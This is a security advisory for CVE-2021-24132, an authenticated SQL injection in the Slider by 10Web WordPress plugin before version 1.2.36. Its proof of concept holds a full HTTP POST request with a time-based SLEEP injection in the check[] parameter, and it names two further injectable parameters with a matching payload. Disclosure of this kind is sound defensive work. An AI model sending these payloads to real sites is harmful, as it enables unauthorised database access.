Slider by 10Web < 1.2.36 – Multiple Authenticated SQL Injection | CVE 2021-24132

Description

The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.

Proof of Concept

Vulnerable param: `check[]`
Vulnerable function: WDW_S_Library::get

```
POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate&current_id=
```

Other SQLi:

- File: admin/models/WDSModelWDSExport.php
- Function: export_full
- Params: slider_ids_string
- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5

- File: admin/controllers/Sliders.php
- Function: save_slider_db
- Params: del_slide_ids_string
- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5